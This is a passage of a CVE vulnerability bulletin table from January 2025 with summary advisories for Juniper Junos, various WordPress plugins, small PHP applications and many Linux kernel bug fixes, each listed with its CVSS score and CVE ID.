An Improper Handling of Exceptional Conditions vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated adjacent attacker sending a specific BGP update packet to cause rpd to crash and restart, resulting in a Denial of Service (DoS). Continuous receipt and processing of this packet will create a sustained Denial of Service (DoS) condition. This issue affects iBGP and eBGP, and both IPv4 and IPv6 are affected by this vulnerability. This issue affects Junos OS: * from 21.4 before 21.4R3-S9, * from 22.2 before 22.2R3-S5, * from 22.3 before 22.3R3-S4, * from 22.4 before 22.4R3-S5, * from 23.2 before 23.2R2-S3, * from 23.4 before 23.4R2-S3, * from 24.2 before 24.2R1-S2, 24.2R2; This issue does not affect versions prior to 21.1R1. Junos OS Evolved: * from 21.4 before 21.4R3-S9-EVO, * from 22.2 before 22.2R3-S5-EVO, * from 22.3 before 22.3R3-S4-EVO, * from 22.4 before 22.4R3-S5-EVO, * from 23.2 before 23.2R2-S3-EVO, * from 23.4 before 23.4R2-S3-EVO, * from 24.2 before 24.2R1-S2-EVO, 24.2R2-EVO. This issue does not affect versions prior to 21.1R1-EVO | 2025-01-09 | 6.5 | CVE-2025-21602 |
| Juniper Networks--Junos OS |
An Exposure of Sensitive Information to an Unauthorized Actor vulnerability in the command-line interface (CLI) of Juniper Networks Junos OS on SRX Series devices allows a local, low-privileged user with access to the Junos CLI to view the contents of sensitive files on the file system. Through the execution of either 'show services advanced-anti-malware' or 'show services security-intelligence' command, a user with limited permissions (e.g., a low privilege login class user) can access protected files that should not be accessible to the user. These files may contain sensitive information that can be used to cause further impact to the system. This issue affects Junos OS SRX Series: * All versions before 21.4R3-S8, * from 22.2 before 22.2R3-S5, * from 22.3 before 22.3R3-S3, * from 22.4 before 22.4R3-S2, * from 23.2 before 23.2R2-S1, * from 23.4 before 23.4R2. | 2025-01-09 | 5.5 | CVE-2025-21592 |
| Juniper Networks--Junos OS |
An Improper Handling of Exceptional Conditions vulnerability in the command-line processing of Juniper Networks Junos OS on SRX1500, SRX4100, and SRX4200 devices allows a local, low-privileged authenticated attacker executing the 'show chassis environment pem' command to cause the chassis daemon (chassisd) to crash and restart, resulting in a temporary Denial of Service (DoS). However, repeated execution of this command will eventually cause the chassisd process to fail to restart, impacting packet processing on the system. This issue affects Junos OS on SRX1500, SRX4100, SRX4200: * All versions before 21.4R3-S9, * from 22.2 before 22.2R3-S5, * from 22.3 before 22.3R3-S4, * from 22.4 before 22.4R3-S4, * from 23.2 before 23.2R2-S3, * from 23.4 before 23.4R2-S1. | 2025-01-09 | 5.5 | CVE-2025-21596 |
| Justin Twerdy--Genesis Style Shortcodes |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Justin Twerdy Genesis Style Shortcodes allows DOM-Based XSS.This issue affects Genesis Style Shortcodes: from n/a through 1.0. | 2025-01-09 | 6.5 | CVE-2025-22823 |
| justinticktock--Role Includer |
The Role Includer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'user_id' parameter in all versions up to, and including, 1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12124 |
| KentoThemes--Justified Image Gallery |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in KentoThemes Justified Image Gallery allows Stored XSS.This issue affects Justified Image Gallery: from n/a through 1.0. | 2025-01-07 | 6.5 | CVE-2025-22518 |
| Kingsoft--WPS Office |
A vulnerability was found in Kingsoft WPS Office 6.14.0 on macOS. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component TCC Handler. The manipulation leads to code injection. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-08 | 5.3 | CVE-2024-13187 |
| kurniaramadhan--E-Commerce-PHP |
A vulnerability was found in kurniaramadhan E-Commerce-PHP 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /blog-details.php. The manipulation of the argument blog_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-09 | 5.5 | CVE-2024-13204 |
| kurniaramadhan--E-Commerce-PHP |
A vulnerability was found in kurniaramadhan E-Commerce-PHP 1.0. It has been classified as problematic. Affected is an unknown function. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-09 | 4.3 | CVE-2024-13203 |
| Laborator--Aurum - WordPress & WooCommerce Shopping Theme |
The Aurum - WordPress & WooCommerce Shopping Theme theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'lab_1cl_demo_install_package_content' function in all versions up to, and including, 4.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite content with imported demo content. | 2025-01-07 | 4.3 | CVE-2024-12781 |
| LabRedesCefetRJ--WeGIA |
WeGIA is a web manager for charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the modulos_visiveis.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the msg_c parameter. This vulnerability is fixed in 3.2.8. | 2025-01-10 | 6.5 | CVE-2025-22596 |
| LabRedesCefetRJ--WeGIA |
WeGIA is a web manager for charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the home.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the msg_c parameter. This vulnerability is fixed in 3.2.8. | 2025-01-10 | 6.5 | CVE-2025-22599 |
| LabRedesCefetRJ--WeGIA |
WeGIA is a web manager for charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the configuracao_doacao.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the avulso parameter. This vulnerability is fixed in 3.2.8. | 2025-01-10 | 6.5 | CVE-2025-22600 |
| lddwebdesign--LDD Directory Lite |
The LDD Directory Lite plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12540 |
| leiyuxi--cy-fast |
A vulnerability, which was classified as critical, was found in leiyuxi cy-fast 1.0. Affected is the function listData of the file /sys/role/listData. The manipulation of the argument order leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 6.3 | CVE-2025-0333 |
| leiyuxi--cy-fast |
A vulnerability has been found in leiyuxi cy-fast 1.0 and classified as critical. Affected by this vulnerability is the function listData of the file /sys/user/listData. The manipulation of the argument order leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 6.3 | CVE-2025-0334 |
| leiyuxi--cy-fast |
A vulnerability has been found in leiyuxi cy-fast 1.0 and classified as critical. Affected by this vulnerability is the function listData of the file /commpara/listData. The manipulation of the argument order leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 6.3 | CVE-2025-0344 |
| leiyuxi--cy-fast |
A vulnerability was found in leiyuxi cy-fast 1.0 and classified as critical. Affected by this issue is the function listData of the file /sys/menu/listData. The manipulation of the argument order leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 6.3 | CVE-2025-0345 |
| Lenderd--1003 Mortgage Application |
Missing Authorization vulnerability in Lenderd 1003 Mortgage Application allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects 1003 Mortgage Application: from n/a through 1.87. | 2025-01-07 | 4.3 | CVE-2025-22591 |
| letscms--Binary MLM Woocommerce |
The Binary MLM Woocommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0. This is due to missing or incorrect nonce validation on the 'bmw_display_pv_set_page' function and insufficient input sanitization and output escaping of the 'product_points' parameter. This makes it possible for unauthenticated attackers to inject arbitrary web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12383 |
| letscms--Binary MLM Woocommerce |
The Binary MLM Woocommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12384 |
| letscms--Unilevel MLM Plan |
The Unilevel MLM Plan plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12324 |
| levelfourstorefront--Shopping Cart & eCommerce Store |
The Shopping Cart & eCommerce Store plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the webhook function in all versions up to, and including, 5.7.8. This makes it possible for unauthenticated attackers to modify order statuses. | 2025-01-08 | 5.3 | CVE-2024-12712 |
| librdf--Raptor RDF Syntax Library |
In Raptor RDF Syntax Library through 2.0.16, there is a heap-based buffer over-read when parsing triples with the nquads parser in raptor_ntriples_parse_term_internal(). | 2025-01-10 | 4 | CVE-2024-57822 |
| linearoy--Linear |
The Linear plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'linear_block_buy_commissions' shortcode in all versions up to, and including, 2.7.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-09 | 6.4 | CVE-2024-12496 |
| Link Whisper--Link Whisper Free |
Insertion of Sensitive Information into Externally-Accessible File or Directory vulnerability in Link Whisper Link Whisper Free.This issue affects Link Whisper Free: from n/a through 0.7.7. | 2025-01-07 | 5.3 | CVE-2025-22306 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: Bluetooth: btusb: mediatek: add intf release flow when usb disconnect MediaTek claim an special usb intr interface for ISO data transmission. The interface need to be released before unregistering hci device when usb disconnect. Removing BT usb dongle without properly releasing the interface may cause Kernel panic while unregister hci device. | 2025-01-06 | 5.5 | CVE-2024-56757 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: btrfs: check folio mapping after unlock in relocate_one_folio() When we call btrfs_read_folio() to bring a folio uptodate, we unlock the folio. The result of that is that a different thread can modify the mapping (like remove it with invalidate) before we call folio_lock(). This results in an invalid page and we need to try again. In particular, if we are relocating concurrently with aborting a transaction, this can result in a crash like the following: BUG: kernel NULL pointer dereference, address: 0000000000000000 PGD 0 P4D 0 Oops: 0000 [#1] SMP CPU: 76 PID: 1411631 Comm: kworker/u322:5 Workqueue: events_unbound btrfs_reclaim_bgs_work RIP: 0010:set_page_extent_mapped+0x20/0xb0 RSP: 0018:ffffc900516a7be8 EFLAGS: 00010246 RAX: ffffea009e851d08 RBX: ffffea009e0b1880 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffffc900516a7b90 RDI: ffffea009e0b1880 RBP: 0000000003573000 R08: 0000000000000001 R09: ffff88c07fd2f3f0 R10: 0000000000000000 R11: 0000194754b575be R12: 0000000003572000 R13: 0000000003572fff R14: 0000000000100cca R15: 0000000005582fff FS: 0000000000000000(0000) GS:ffff88c07fd00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 000000407d00f002 CR4: 00000000007706f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 PKRU: 55555554 Call Trace: <TASK> ? __die+0x78/0xc0 ? page_fault_oops+0x2a8/0x3a0 ? __switch_to+0x133/0x530 ? wq_worker_running+0xa/0x40 ? exc_page_fault+0x63/0x130 ? asm_exc_page_fault+0x22/0x30 ? set_page_extent_mapped+0x20/0xb0 relocate_file_extent_cluster+0x1a7/0x940 relocate_data_extent+0xaf/0x120 relocate_block_group+0x20f/0x480 btrfs_relocate_block_group+0x152/0x320 btrfs_relocate_chunk+0x3d/0x120 btrfs_reclaim_bgs_work+0x2ae/0x4e0 process_scheduled_works+0x184/0x370 worker_thread+0xc6/0x3e0 ? blk_add_timer+0xb0/0xb0 kthread+0xae/0xe0 ? flush_tlb_kernel_range+0x90/0x90 ret_from_fork+0x2f/0x40 ? flush_tlb_kernel_range+0x90/0x90 ret_from_fork_asm+0x11/0x20 </TASK> This occurs because cleanup_one_transaction() calls destroy_delalloc_inodes() which calls invalidate_inode_pages2() which takes the folio_lock before setting mapping to NULL. We fail to check this, and subsequently call set_extent_mapping(), which assumes that mapping != NULL (in fact it asserts that in debug mode) Note that the "fixes" patch here is not the one that introduced the race (the very first iteration of this code from 2009) but a more recent change that made this particular crash happen in practice. | 2025-01-06 | 5.5 | CVE-2024-56758 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: PCI/MSI: Handle lack of irqdomain gracefully Alexandre observed a warning emitted from pci_msi_setup_msi_irqs() on a RISCV platform which does not provide PCI/MSI support: WARNING: CPU: 1 PID: 1 at drivers/pci/msi/msi.h:121 pci_msi_setup_msi_irqs+0x2c/0x32 __pci_enable_msix_range+0x30c/0x596 pci_msi_setup_msi_irqs+0x2c/0x32 pci_alloc_irq_vectors_affinity+0xb8/0xe2 RISCV uses hierarchical interrupt domains and correctly does not implement the legacy fallback. The warning triggers from the legacy fallback stub. That warning is bogus as the PCI/MSI layer knows whether a PCI/MSI parent domain is associated with the device or not. There is a check for MSI-X, which has a legacy assumption. But that legacy fallback assumption is only valid when legacy support is enabled, but otherwise the check should simply return -ENOTSUPP. Loongarch tripped over the same problem and blindly enabled legacy support without implementing the legacy fallbacks. There are weak implementations which return an error, so the problem was papered over. Correct pci_msi_domain_supports() to evaluate the legacy mode and add the missing supported check into the MSI enable path to complete it. | 2025-01-06 | 5.5 | CVE-2024-56760 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: x86/fred: Clear WFE in missing-ENDBRANCH #CPs An indirect branch instruction sets the CPU indirect branch tracker (IBT) into WAIT_FOR_ENDBRANCH (WFE) state and WFE stays asserted across the instruction boundary. When the decoder finds an inappropriate instruction while WFE is set ENDBR, the CPU raises a #CP fault. For the "kernel IBT no ENDBR" selftest where #CPs are deliberately triggered, the WFE state of the interrupted context needs to be cleared to let execution continue. Otherwise when the CPU resumes from the instruction that just caused the previous #CP, another missing-ENDBRANCH #CP is raised and the CPU enters a dead loop. This is not a problem with IDT because it doesn't preserve WFE and IRET doesn't set WFE. But FRED provides space on the entry stack (in an expanded CS area) to save and restore the WFE state, thus the WFE state is no longer clobbered, so software must clear it. Clear WFE to avoid dead looping in ibt_clear_fred_wfe() and the !ibt_fatal code path when execution is allowed to continue. Clobbering WFE in any other circumstance is a security-relevant bug. [ dhansen: changelog rewording ] | 2025-01-06 | 5.5 | CVE-2024-56761 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: tracing: Prevent bad count for tracing_cpumask_write If a large count is provided, it will trigger a warning in bitmap_parse_user. Also check zero for it. | 2025-01-06 | 5.5 | CVE-2024-56763 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: dmaengine: at_xdmac: avoid null_prt_deref in at_xdmac_prep_dma_memset The at_xdmac_memset_create_desc may return NULL, which will lead to a null pointer dereference. For example, the len input is error, or the atchan->free_descs_list is empty and memory is exhausted. Therefore, add check to avoid this. | 2025-01-06 | 5.5 | CVE-2024-56767 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: bpf: Fix bpf_get_smp_processor_id() on !CONFIG_SMP On x86-64 calling bpf_get_smp_processor_id() in a kernel with CONFIG_SMP disabled can trigger the following bug, as pcpu_hot is unavailable: [ 8.471774] BUG: unable to handle page fault for address: 00000000936a290c [ 8.471849] #PF: supervisor read access in kernel mode [ 8.471881] #PF: error_code(0x0000) - not-present page Fix by inlining a return 0 in the !CONFIG_SMP case. | 2025-01-06 | 5.5 | CVE-2024-56768 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: media: dvb-frontends: dib3000mb: fix uninit-value in dib3000_write_reg Syzbot reports [1] an uninitialized value issue found by KMSAN in dib3000_read_reg(). Local u8 rb[2] is used in i2c_transfer() as a read buffer; in case that call fails, the buffer may end up with some undefined values. Since no elaborate error handling is expected in dib3000_write_reg(), simply zero out rb buffer to mitigate the problem. [1] Syzkaller report dvb-usb: bulk message failed: -22 (6/0) ===================================================== BUG: KMSAN: uninit-value in dib3000mb_attach+0x2d8/0x3c0 drivers/media/dvb-frontends/dib3000mb.c:758 dib3000mb_attach+0x2d8/0x3c0 drivers/media/dvb-frontends/dib3000mb.c:758 dibusb_dib3000mb_frontend_attach+0x155/0x2f0 drivers/media/usb/dvb-usb/dibusb-mb.c:31 dvb_usb_adapter_frontend_init+0xed/0x9a0 drivers/media/usb/dvb-usb/dvb-usb-dvb.c:290 dvb_usb_adapter_init drivers/media/usb/dvb-usb/dvb-usb-init.c:90 [inline] dvb_usb_init drivers/media/usb/dvb-usb/dvb-usb-init.c:186 [inline] dvb_usb_device_init+0x25a8/0x3760 drivers/media/usb/dvb-usb/dvb-usb-init.c:310 dibusb_probe+0x46/0x250 drivers/media/usb/dvb-usb/dibusb-mb.c:110 ... Local variable rb created at: dib3000_read_reg+0x86/0x4e0 drivers/media/dvb-frontends/dib3000mb.c:54 dib3000mb_attach+0x123/0x3c0 drivers/media/dvb-frontends/dib3000mb.c:758 ... | 2025-01-06 | 5.5 | CVE-2024-56769 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: net/sched: netem: account for backlog updates from child qdisc In general, 'qlen' of any classful qdisc should keep track of the number of packets that the qdisc itself and all of its children holds. In case of netem, 'qlen' only accounts for the packets in its internal tfifo. When netem is used with a child qdisc, the child qdisc can use 'qdisc_tree_reduce_backlog' to inform its parent, netem, about created or dropped SKBs. This function updates 'qlen' and the backlog statistics of netem, but netem does not account for changes made by a child qdisc. 'qlen' then indicates the wrong number of packets in the tfifo. If a child qdisc creates new SKBs during enqueue and informs its parent about this, netem's 'qlen' value is increased. When netem dequeues the newly created SKBs from the child, the 'qlen' in netem is not updated. If 'qlen' reaches the configured sch->limit, the enqueue function stops working, even though the tfifo is not full. Reproduce the bug: Ensure that the sender machine has GSO enabled. Configure netem as root qdisc and tbf as its child on the outgoing interface of the machine as follows: $ tc qdisc add dev <oif> root handle 1: netem delay 100ms limit 100 $ tc qdisc add dev <oif> parent 1:0 tbf rate 50Mbit burst 1542 latency 50ms Send bulk TCP traffic out via this interface, e.g., by running an iPerf3 client on the machine. Check the qdisc statistics: $ tc -s qdisc show dev <oif> Statistics after 10s of iPerf3 TCP test before the fix (note that netem's backlog > limit, netem stopped accepting packets): qdisc netem 1: root refcnt 2 limit 1000 delay 100ms Sent 2767766 bytes 1848 pkt (dropped 652, overlimits 0 requeues 0) backlog 4294528236b 1155p requeues 0 qdisc tbf 10: parent 1:1 rate 50Mbit burst 1537b lat 50ms Sent 2767766 bytes 1848 pkt (dropped 327, overlimits 7601 requeues 0) backlog 0b 0p requeues 0 Statistics after the fix: qdisc netem 1: root refcnt 2 limit 1000 delay 100ms Sent 37766372 bytes 24974 pkt (dropped 9, overlimits 0 requeues 0) backlog 0b 0p requeues 0 qdisc tbf 10: parent 1:1 rate 50Mbit burst 1537b lat 50ms Sent 37766372 bytes 24974 pkt (dropped 327, overlimits 96017 requeues 0) backlog 0b 0p requeues 0 tbf segments the GSO SKBs (tbf_segment) and updates the netem's 'qlen'. The interface fully stops transferring packets and "locks". In this case, the child qdisc and tfifo are empty, but 'qlen' indicates the tfifo is at its limit and no more packets are accepted. This patch adds a counter for the entries in the tfifo. Netem's 'qlen' is only decreased when a packet is returned by its dequeue function, and not during enqueuing into the child qdisc. External updates to 'qlen' are thus accounted for and only the behavior of the backlog statistics changes. As in other qdiscs, 'qlen' then keeps track of how many packets are held in netem and all of its children. As before, sch->limit remains as the maximum number of packets in the tfifo. The same applies to netem's backlog statistics. | 2025-01-08 | 5.5 | CVE-2024-56770 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: mtd: spinand: winbond: Fix 512GW, 01GW, 01JW and 02JW ECC information These four chips: * W25N512GW * W25N01GW * W25N01JW * W25N02JW all require a single bit of ECC strength and thus feature an on-die Hamming-like ECC engine. There is no point in filling a ->get_status() callback for them because the main ECC status bytes are located in standard places, and retrieving the number of bitflips in case of corrected chunk is both useless and unsupported (if there are bitflips, then there is 1 at most, so no need to query the chip for that). Without this change, a kernel warning triggers every time a bit flips. | 2025-01-08 | 5.5 | CVE-2024-56771 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: kunit: Fix potential null dereference in kunit_device_driver_test() kunit_kzalloc() may return a NULL pointer, dereferencing it without NULL check may lead to NULL dereference. Add a NULL check for test_state. | 2025-01-08 | 5.5 | CVE-2024-56773 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: btrfs: add a sanity check for btrfs root in btrfs_search_slot() Syzbot reports a null-ptr-deref in btrfs_search_slot(). The reproducer is using rescue=ibadroots, and the extent tree root is corrupted thus the extent tree is NULL. When scrub tries to search the extent tree to gather the needed extent info, btrfs_search_slot() doesn't check if the target root is NULL or not, resulting the null-ptr-deref. Add sanity check for btrfs root before using it in btrfs_search_slot(). | 2025-01-08 | 5.5 | CVE-2024-56774 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: drm/sti: avoid potential dereference of error pointers The return value of drm_atomic_get_crtc_state() needs to be checked. To avoid use of error pointer 'crtc_state' in case of the failure. | 2025-01-08 | 5.5 | CVE-2024-56776 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: drm/sti: avoid potential dereference of error pointers in sti_gdp_atomic_check The return value of drm_atomic_get_crtc_state() needs to be checked. To avoid use of error pointer 'crtc_state' in case of the failure. | 2025-01-08 | 5.5 | CVE-2024-56777 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: drm/sti: avoid potential dereference of error pointers in sti_hqvdp_atomic_check The return value of drm_atomic_get_crtc_state() needs to be checked. To avoid use of error pointer 'crtc_state' in case of the failure. | 2025-01-08 | 5.5 | CVE-2024-56778 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: nfsd: fix nfs4_openowner leak when concurrent nfsd4_open occur The action force umount(umount -f) will attempt to kill all rpc_task even umount operation may ultimately fail if some files remain open. Consequently, if an action attempts to open a file, it can potentially send two rpc_task to nfs server. NFS CLIENT thread1 thread2 open("file") ... nfs4_do_open _nfs4_do_open _nfs4_open_and_get_state _nfs4_proc_open nfs4_run_open_task /* rpc_task1 */ rpc_run_task rpc_wait_for_completion_task umount -f nfs_umount_begin rpc_killall_tasks rpc_signal_task rpc_task1 been wakeup and return -512 _nfs4_do_open // while loop ... nfs4_run_open_task /* rpc_task2 */ rpc_run_task rpc_wait_for_completion_task While processing an open request, nfsd will first attempt to find or allocate an nfs4_openowner. If it finds an nfs4_openowner that is not marked as NFS4_OO_CONFIRMED, this nfs4_openowner will released. Since two rpc_task can attempt to open the same file simultaneously from the client to server, and because two instances of nfsd can run concurrently, this situation can lead to lots of memory leak. Additionally, when we echo 0 to /proc/fs/nfsd/threads, warning will be triggered. NFS SERVER nfsd1 nfsd2 echo 0 > /proc/fs/nfsd/threads nfsd4_open nfsd4_process_open1 find_or_alloc_open_stateowner // alloc oo1, stateid1 nfsd4_open nfsd4_process_open1 find_or_alloc_open_stateowner // find oo1, without NFS4_OO_CONFIRMED release_openowner unhash_openowner_locked list_del_init(&oo->oo_perclient) // cannot find this oo // from client, LEAK!!! alloc_stateowner // alloc oo2 nfsd4_process_open2 init_open_stateid // associate oo1 // with stateid1, stateid1 LEAK!!! nfs4_get_vfs_file // alloc nfsd_file1 and nfsd_file_mark1 // all LEAK!!! nfsd4_process_open2 ... write_threads ... nfsd_destroy_serv nfsd_shutdown_net nfs4_state_shutdown_net nfs4_state_destroy_net destroy_client __destroy_client // won't find oo1!!! nfsd_shutdown_generic nfsd_file_cache_shutdown kmem_cache_destroy for nfsd_file_slab and nfsd_file_mark_slab // bark since nfsd_file1 // and nfsd_file_mark1 // still alive ======================================================================= BUG nfsd_file (Not tainted): Objects remaining in nfsd_file on __kmem_cache_shutdown() ----------------------------------------------------------------------- Slab 0xffd4000004438a80 objects=34 used=1 fp=0xff11000110e2ad28 flags=0x17ffffc0000240(workingset|head|node=0|zone=2|lastcpupid=0x1fffff) CPU: 4 UID: 0 PID: 757 Comm: sh Not tainted 6.12.0-rc6+ #19 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.1-2.fc37 04/01/2014 Call Trace: <TASK> dum ---truncated--- | 2025-01-08 | 5.5 | CVE-2024-56779 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: quota: flush quota_release_work upon quota writeback One of the paths quota writeback is called from is: freeze_super() sync_filesystem() ext4_sync_fs() dquot_writeback_dquots() Since we currently don't always flush the quota_release_work queue in this path, we can end up with the following race: 1. dquot are added to releasing_dquots list during regular operations. 2. FS Freeze starts, however, this does not flush the quota_release_work queue. 3. Freeze completes. 4. Kernel eventually tries to flush the workqueue while FS is frozen which hits a WARN_ON since transaction gets started during frozen state: ext4_journal_check_start+0x28/0x110 [ext4] (unreliable) __ext4_journal_start_sb+0x64/0x1c0 [ext4] ext4_release_dquot+0x90/0x1d0 [ext4] quota_release_workfn+0x43c/0x4d0 Which is the following line: WARN_ON(sb->s_writers.frozen == SB_FREEZE_COMPLETE); Which ultimately results in generic/390 failing due to dmesg noise. This was detected on powerpc machine 15 cores. To avoid this, make sure to flush the workqueue during dquot_writeback_dquots() so we dont have any pending workitems after freeze. | 2025-01-08 | 5.5 | CVE-2024-56780 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: powerpc/prom_init: Fixup missing powermac #size-cells On some powermacs `escc` nodes are missing `#size-cells` properties, which is deprecated and now triggers a warning at boot since commit 045b14ca5c36 ("of: WARN on deprecated #address-cells/#size-cells handling"). For example: Missing '#size-cells' in /pci@f2000000/mac-io@c/escc@13000 WARNING: CPU: 0 PID: 0 at drivers/of/base.c:133 of_bus_n_size_cells+0x98/0x108 Hardware name: PowerMac3,1 7400 0xc0209 PowerMac ... Call Trace: of_bus_n_size_cells+0x98/0x108 (unreliable) of_bus_default_count_cells+0x40/0x60 __of_get_address+0xc8/0x21c __of_address_to_resource+0x5c/0x228 pmz_init_port+0x5c/0x2ec pmz_probe.isra.0+0x144/0x1e4 pmz_console_init+0x10/0x48 console_init+0xcc/0x138 start_kernel+0x5c4/0x694 As powermacs boot via prom_init it's possible to add the missing properties to the device tree during boot, avoiding the warning. Note that `escc-legacy` nodes are also missing `#size-cells` properties, but they are skipped by the macio driver, so leave them alone. Depends-on: 045b14ca5c36 ("of: WARN on deprecated #address-cells/#size-cells handling") | 2025-01-08 | 5.5 | CVE-2024-56781 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: ACPI: x86: Add adev NULL check to acpi_quirk_skip_serdev_enumeration() acpi_dev_hid_match() does not check for adev == NULL, dereferencing it unconditional. Add a check for adev being NULL before calling acpi_dev_hid_match(). At the moment acpi_quirk_skip_serdev_enumeration() is never called with a controller_parent without an ACPI companion, but better safe than sorry. | 2025-01-08 | 5.5 | CVE-2024-56782 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_socket: remove WARN_ON_ONCE on maximum cgroup level cgroup maximum depth is INT_MAX by default, there is a cgroup toggle to restrict this maximum depth to a more reasonable value not to harm performance. Remove unnecessary WARN_ON_ONCE which is reachable from userspace. | 2025-01-08 | 5.5 | CVE-2024-56783 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: MIPS: Loongson64: DTS: Really fix PCIe port nodes for ls7a Fix the dtc warnings: arch/mips/boot/dts/loongson/ls7a-pch.dtsi:68.16-416.5: Warning (interrupt_provider): /bus@10000000/pci@1a000000: '#interrupt-cells' found, but node is not an interrupt provider arch/mips/boot/dts/loongson/ls7a-pch.dtsi:68.16-416.5: Warning (interrupt_provider): /bus@10000000/pci@1a000000: '#interrupt-cells' found, but node is not an interrupt provider arch/mips/boot/dts/loongson/loongson64g_4core_ls7a.dtb: Warning (interrupt_map): Failed prerequisite 'interrupt_provider' And a runtime warning introduced in commit 045b14ca5c36 ("of: WARN on deprecated #address-cells/#size-cells handling"): WARNING: CPU: 0 PID: 1 at drivers/of/base.c:106 of_bus_n_addr_cells+0x9c/0xe0 Missing '#address-cells' in /bus@10000000/pci@1a000000/pci_bridge@9,0 The fix is similar to commit d89a415ff8d5 ("MIPS: Loongson64: DTS: Fix PCIe port nodes for ls7a"), which has fixed the issue for ls2k (despite its subject mentions ls7a). | 2025-01-08 | 5.5 | CVE-2024-56785 |
| linux -- linux_kernel |
